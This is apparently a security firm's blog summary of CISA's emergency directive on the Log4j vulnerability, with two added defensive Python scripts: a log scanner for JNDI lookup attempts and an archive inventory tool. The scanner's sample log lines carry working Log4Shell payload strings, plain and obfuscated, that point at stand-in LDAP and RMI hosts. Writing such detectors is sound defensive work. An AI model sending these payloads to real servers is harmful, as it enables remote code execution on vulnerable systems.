The US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) issued Emergency Directive 22-02 this past Friday, December 17, 2021, concerning the Log4j vulnerability (CVE-2021-44228).
According to CISA, the Log4j vulnerability poses an "unacceptable risk" to Federal Civilian Executive Branch agencies and requires emergency action. This determination is based on the current exploitation of this vulnerability by threat actors in the wild, the likelihood of further exploitation of the vulnerability, the prevalence of the affected software in the federal enterprise and the high potential for a compromise of agency information systems.
“The log4j vulnerabilities pose an unacceptable risk to federal network security,” CISA Director Jen Easterly said following the emergency directive. “CISA has issued this emergency directive to drive federal civilian agencies to take action now to protect their networks, focusing first on internet-facing devices that pose the greatest immediate risk.”
The directive requires agencies to take the following actions:
1. Enumerate all solution stacks accepting data input from the internet.
2. Evaluate all software assets in the identified solution stacks against the CISA-managed GitHub repository (https://github.com/cisagov/log4j-affected-db) to determine whether Log4j is present in those assets and, if so, whether those assets are affected by the vulnerability. If a software product is not listed in the repository, request its addition by submitting a pull request using the link on the GitHub page.
3. For all software assets that agencies identify as affected by CVE-2021-44228, take one of the following actions:
   a. Update assets for which patches have been provided. Remediation timelines prescribed in BOD 22-01 “may be adjusted in the case of grave risk to the Federal Enterprise.” Given the criticality of CVE-2021-44228, agencies must immediately patch any vulnerable internet-facing devices for which patches are available, under an emergency change window.
   b. Mitigate the risk of exploitation using one of the mitigating measures CISA provides.
   c. Remove affected software assets from agency networks.
4. For all solution stacks containing software that agencies identified as affected: assume compromise, identify common post-exploit sources and activity, and persistently investigate and monitor for signs of malicious activity and anomalous traffic patterns (e.g., JNDI LDAP/RMI outbound traffic, DMZ systems initiating outbound connections).
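The monitoring step asks for evidence of JNDI LDAP/RMI activity. As an added example (not part of the directive or of the original article), the Python script below flags JNDI lookup strings in web-server access logs, including the URL-encoded and nested-lookup obfuscations (${lower:…}, ${::-…}) that attackers used to slip past naive "${jndi:" string matches. The log lines are constructed for the example, the 203.0.113.0/24 addresses are documentation space, and the function names are this example's own.

```python
"""Flag log4j JNDI lookup attempts in access-log lines, including common obfuscations."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# ${lower:X} / ${upper:X} with no nested braces inside: innermost lookups resolve first.
CASE_LOOKUP = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^{}]*)\}", re.I)
# ${anything:-X}: an unresolvable lookup whose default value X is what log4j substitutes.
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# What we are actually looking for once the noise is stripped: ${jndi:<scheme>://<host>...}
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:(?://)?\s*([^/:}\s]+)", re.I)


def normalize(text: str, max_rounds: int = 25) -> str:
    """URL-decode, then repeatedly collapse case/default lookups until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def detect(line: str) -> Optional[Dict[str, str]]:
    """Return the scheme and host of a JNDI lookup in the line, or None if there is none."""
    m = JNDI_LOOKUP.search(normalize(line))
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "host": m.group(2)}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run detect() over every line; returns one record per hit with its 1-based line number."""
    hits: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        hit = detect(line)
        if hit:
            hits.append({"line": n, **hit})
    return hits


# Constructed sample access-log lines (not real traffic). Lines 1-4 carry a lookup in
# plain, nested-lower, default-value and URL-encoded form; lines 5-6 are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}${lower:a}${lower:p}://203.0.113.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9:1099/x}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:04 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.8 - - [10/Dec/2021:12:00:06 +0000] "GET /?q=%24%7Benv%3AHOME%7D HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"line {h['line']}: JNDI lookup via {h['scheme']} to {h['host']}")
```

A flagged request only proves an attempt; the stronger signal the directive points at is the application host opening an outbound LDAP or RMI connection to the extracted host shortly afterwards, so pair these hits with egress flow logs. The last sample line shows that a non-JNDI lookup such as ${env:HOME} is not reported by this check, although any user-supplied "${" reaching a Log4j 2 logger before the fix deserves a look.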
By 5 pm EST on December 28, 2021, agencies must report all affected software applications identified in action 3 above using the CISA-provided template, including:
- Application name and version
- Action taken (e.g., updated, mitigated, or removed from agency network)
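Actions 2 and 3 and the report fields above (application, version, action taken) all depend on knowing which deployed archives bundle a vulnerable log4j-core. As an added example, not from CISA or the original article, the Python script below walks a directory of Java archives, recurses into jars nested inside wars and ears, reads the log4j-core version from its Maven pom.properties, and checks whether JndiLookup.class is still present (its removal is the published class-deletion mitigation). The archive names and contents are constructed sample input built in a temporary directory; the status strings are this example's own vocabulary, chosen to line up with the report's action-taken field. It treats 2.15.0 as the first release fixing CVE-2021-44228, the CVE the directive names, and does not grade the later Log4j releases, so read "not affected" as "not affected by this CVE" only.

```python
"""Scan a directory tree of Java archives for bundled log4j-core and classify each hit."""
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Tuple

# Entries inside log4j-core that give away its version and the vulnerable lookup class.
POM_PROPS_RE = re.compile(r"META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")
FIXED = (2, 15, 0)   # first log4j-core release that fixes CVE-2021-44228


def parse_version(v: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1). Pre-release suffixes such as '2.0-beta9' are dropped, which
    lumps every 2.0 pre-release into the affected range (a deliberate over-approximation)."""
    return tuple(int(p) for p in v.split("-")[0].split(".") if p.isdigit())


def classify(version: str, has_jndi_lookup: bool) -> str:
    """Map a log4j-core version plus presence of JndiLookup.class to a reporting status."""
    if parse_version(version) >= FIXED:
        return "not affected by CVE-2021-44228"
    if not has_jndi_lookup:
        # JndiLookup.class stripped from the jar: the class-removal mitigation was applied.
        return "mitigated (JndiLookup.class removed); update still required"
    return "affected by CVE-2021-44228; update or remove"


def inspect_archive(data: bytes, path: str, findings: List[Dict[str, str]]) -> None:
    """Open a jar/war/ear from memory, record any log4j-core in it, recurse into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    version, has_jndi = None, False
    with zf:
        for name in zf.namelist():
            if POM_PROPS_RE.search(name):
                for line in zf.read(name).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
            elif name == JNDI_LOOKUP:
                has_jndi = True
            elif name.lower().endswith(ARCHIVE_EXTS):
                inspect_archive(zf.read(name), f"{path}!{name}", findings)
    if version is not None:
        findings.append({"path": path, "version": version, "status": classify(version, has_jndi)})


def scan_tree(root: str) -> List[Dict[str, str]]:
    """Inspect every archive under root; '!' in a path marks nesting, e.g. app.war!WEB-INF/lib/x.jar."""
    findings: List[Dict[str, str]] = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.lower().endswith(ARCHIVE_EXTS):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    inspect_archive(fh.read(), os.path.relpath(full, root), findings)
    return findings


# --- constructed sample input: fake archives carrying the entry names a real log4j-core has ---
def _zip_bytes(entries: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in entries.items():
            zf.writestr(name, body)
    return buf.getvalue()


def _fake_log4j_core(version: str, with_jndi_lookup: bool = True) -> bytes:
    props = f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n"
    entries = {"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties": props.encode()}
    if with_jndi_lookup:
        entries[JNDI_LOOKUP] = b"\xca\xfe\xba\xbe"   # placeholder bytes, not a real class file
    return _zip_bytes(entries)


def build_sample_tree(root: str) -> None:
    """Four made-up applications: vulnerable, patched, class-removal mitigated, no log4j at all."""
    samples = {
        "billing.war": _zip_bytes({"WEB-INF/lib/log4j-core-2.14.1.jar": _fake_log4j_core("2.14.1")}),
        "portal.jar": _zip_bytes({"lib/log4j-core-2.17.1.jar": _fake_log4j_core("2.17.1")}),
        "legacy.jar": _zip_bytes({"lib/log4j-core-2.11.2.jar": _fake_log4j_core("2.11.2", False)}),
        "tools.jar": _zip_bytes({"com/example/Main.class": b"\xca\xfe\xba\xbe"}),
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)


def run_demo() -> List[Dict[str, str]]:
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['path']}\tlog4j-core {f['version']}\t{f['status']}")
```

Point scan_tree() at an application server's deployment directory to get one row per bundled log4j-core with the path that nests it; shaded or repackaged copies of Log4j that drop the Maven metadata will not be found by the pom.properties check, so a presence check on JndiLookup.class alone (or a class-file hash list) is the fallback for those.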
These required actions apply to agency applications in any information system, including an information system used or operated by another entity on behalf of an agency, that collects, processes, stores, transmits, disseminates or otherwise maintains agency information (i.e., all applications within agency Authority to Operate (ATO) boundaries).
For federal information systems hosted in third-party environments (such as cloud), each agency remains responsible for maintaining an inventory of its information systems hosted in those environments (FedRAMP Authorized or otherwise), for all required reporting to CISA covering those systems, and for working directly with its service providers to obtain status updates and to ensure compliance with this Directive.
The Schneider Downs cybersecurity practice consists of experts offering a comprehensive set of information technology security services, including penetration testing, intrusion prevention/detection review, ransomware security, vulnerability assessments and a robust digital forensics and incident response team. For more information, visit www.schneiderdowns.com/cybersecurity or contact the team at [email protected].